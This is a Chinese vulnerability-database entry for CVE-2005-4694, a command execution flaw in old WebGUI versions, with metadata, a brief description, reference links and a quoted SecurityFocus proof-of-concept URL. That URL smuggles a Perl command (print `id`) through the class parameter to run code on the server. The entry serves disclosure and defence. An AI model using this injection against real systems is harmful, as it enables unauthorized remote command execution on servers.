WebGUI任意命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109131 漏洞类型 输入验证
发布时间 2005-10-12 更新时间 2006-02-03
CVE编号 CVE-2005-4694 CNNVD-ID CNNVD-200512-638
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26344
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-638
|漏洞详情
PlainBlackWebGUI6.3.0以及其他6.7.6之前的版本中的Asset.pm所含的www_add方法存在未明漏洞,远程攻击者可以通过未知攻击向量执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/15083/info

WebGUI is prone to an arbitrary command execution vulnerability. This is due to insufficient sanitization of user-supplied data.

This issue can facilitate unauthorized remote access. 

http://www.example.com/WebGUI/index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60;
|参考资料

来源:XF
名称:webgui-unknown-code-execution(22730)
链接:http://xforce.iss.net/xforce/xfdb/22730
来源:BID
名称:15083
链接:http://www.securityfocus.com/bid/15083
来源:OSVDB
名称:19933
链接:http://www.osvdb.org/19933
来源:VUPEN
名称:ADV-2005-2060
链接:http://www.frsirt.com/english/advisories/2005/2060
来源:SECUNIA
名称:17158
链接:http://secunia.com/advisories/17158
来源:www.plainblack.com
链接:http://www.plainblack.com/getwebgui/advisories/security-exploit-patch-for-6.3-and-above